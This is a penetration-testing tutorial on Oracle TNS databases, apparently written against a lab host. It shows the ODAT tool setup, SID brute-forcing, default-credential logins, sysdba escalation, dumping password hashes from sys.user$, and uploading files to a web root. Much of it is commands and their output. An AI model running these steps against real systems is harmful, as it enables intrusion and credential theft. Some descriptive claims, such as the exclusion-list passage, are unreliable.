Posted inScanning and Analysis

Oracle databases, TNS, and how to hack it.

Posted inScanning and Analysis

The Oracle Transparent Network Substrate (TNS) server is a communication protocol that enables communication between Oracle databases and applications across networks. Initially introduced as part of the Oracle Net Services software suite, TNS supports diverse networking protocols, including IPX/SPX and TCP/IP protocol stacks, facilitating communication between Oracle databases and client applications. Its built-in encryption mechanism ensures the security of data transmitted. Over time, TNS has undergone updates to support newer technologies, including IPv6 and SSL/TLS encryption.

Additionally, TNS provides encryption for communication between the client and server, adding an extra layer of security on top of the TCP/IP protocol. This feature helps protect the database architecture from unauthorized access and attacks that aim to compromise data transmitted over the network.

By default, the listener is set to listen for incoming connections on port TCP/1521. However, this default port can be changed either during installation or later in the configuration file. The TNS listener is configured to support various network protocols, including TCP, UDP, and others. It can also manage multiple network interfaces, allowing it to listen on specific IP addresses or on all available interfaces. By default, Oracle TNS can be remotely managed in Oracle 8i/9i but not in Oracle 10g/11g.

The listener will only accept connections from authorized hosts and will perform basic authentication using a combination of hostnames, IP addresses, usernames, and passwords. Additionally, the listener will utilize Oracle Net Services to encrypt communication between the client and the server. The configuration files for Oracle TNS are named **tnsnames.ora** and **listener.ora**, and they are typically located in the **network/admin** directory. The plain text file contains configuration information for Oracle database instances and other network services that use the TNS protocol.

Oracle 9 has a default password, CHANGE_ON_INSTALL, while Oracle 10 does not have a default password set. Additionally, the Oracle DBSNMP service also comes with a default password, dbsnmp. Also, many organizations still use the finger service together with Oracle, which can put Oracle’s service at risk and make it vulnerable when we have the required knowledge of a home directory.

Oracle databases can be safeguarded by utilizing a user-created text file known as the PL/SQL Exclusion List (PlsqlExclusionList). This file must be placed within the $ORACLE_HOME/sqldeveloper directory and contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance, functioning as a blacklist that is inaccessible through the Oracle Application Server.

Oracle Database Attacking Tool (ODAT)

Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python. Its primary purpose is to enumerate and exploit vulnerabilities in Oracle databases. ODAT enables users to identify and exploit various security flaws in Oracle databases, such as SQL injection, remote code execution, and privilege escalation.

Oracle-Tools-setup.sh

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Testing ODAT (Oracle Database Attacking Tool)

[!bash!]$ ./odat.py -h

usage: odat.py [-h] [--version]
               {all,tnscmd,tnspoison,sidguesser,snguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
               ...

            _  __   _  ___ 
           / \|  \ / \|_ _|
          ( o ) o ) o || | 
           \_/|__/|_n_||_| 
-------------------------------------------
  _        __           _           ___ 
 / \      |  \         / \         |_ _|
( o )       o )         o |         | | 
 \_/racle |__/atabase |_n_|ttacking |_|ool 
-------------------------------------------

By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
...SNIP...

ODAT Scan

[!bash!]$ ./odat.py all -s 10.129.204.235

[+] Checking if target 10.129.204.235:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.129.204.235:1521 is well configured. Continue...

...SNIP...

[!] Notice: 'mdsys' account is locked, so skipping this username for password           #####################| ETA:  00:01:16 
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password       #####################| ETA:  00:01:05 
[!] Notice: 'outln' account is locked, so skipping this username for password           #####################| ETA:  00:00:59
[+] Valid credentials found: scott/tiger. Continue...

...SNIP...

Scan Oracle with Nmap

nmap includes Oracle scanning scripts too. First, we would check to see if the default 1521 port is open and accessible.

[!bash!]$ sudo nmap -p1521 -sV 10.129.204.235 --open

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 10:59 EST
Nmap scan report for 10.129.204.235
Host is up (0.0041s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.64 seconds

Nmap – SID Bruteforcing

[!bash!]$ sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-06 11:01 EST
Nmap scan report for 10.129.204.235
Host is up (0.0044s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
| oracle-sid-brute: 
|_  XE

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds

SQLplus – Log In

Once you have connected to the Oracle instance and have valid credentials in hand, you can connect to a specific SID like this:

[!bash!]$ sqlplus scott/tiger@10.129.204.235/XE

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
Version 21.4.0.0.0

Copyright (c) 1982, 2021, Oracle. All rights reserved.

ERROR:
ORA-28002: the password will expire within 7 days



Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

If you come across the following error sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory, you can execute the below to get past it.

[!bash!]$ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf

Oracle RDBMS – Interaction

Here is how we would select the names of all tables in the database.

SQL> select table_name from all_tables;

TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
TABLE_PRIVILEGE_MAP
STMT_AUDIT_OPTION_MAP
AUDIT_ACTIONS
WRR$_REPLAY_CALL_FILTER
HS_BULKLOAD_VIEW_OBJ
HS$_PARALLEL_METADATA
HS_PARTITION_COL_NAME
HS_PARTITION_COL_TYPE
HELP

...SNIP...


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Oracle RDBMS – Database Enumeration

In the example below, the user Scott lacks administrative privileges. However, we can attempt to log in using this account as the System Database Admin (sysdba), thereby gaining higher privileges. This is possible when the user Scott possesses the necessary privileges typically granted by the database administrator.

[!bash!]$ sqlplus scott/tiger@10.129.204.235/XE as sysdba

SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:32:58 2023
Version 21.4.0.0.0

Copyright (c) 1982, 2021, Oracle. All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
...SNIP...

Oracle RDBMS – Extract Password Hashes

We could retrieve the password hashes from the sys.user$ and try to crack them offline. The query for this would look like the following:

SQL> select name, password from sys.user$;

NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            FBA343E7D6C8BC9D
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM                         B5073FE1DE351687
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
OUTLN                          4A3BA55E08595C81
EXP_FULL_DATABASE

NAME                           PASSWORD
------------------------------ ------------------------------
IMP_FULL_DATABASE
LOGSTDBY_ADMINISTRATOR
...SNIP...

Oracle RDBMS – File Upload

You could try uploading a file to a common web server directory using ODAT. Then access that file through the web browser or a hacking utility that requires a file on the server to execute.

[!bash!]$ echo "Oracle File Upload Test" > testing.txt
[!bash!]$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server                                                                                                  
[+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server l

Then test like this:

[!bash!]$ curl -X GET http://10.129.204.235/testing.txt

Oracle File Upload Test

Tags: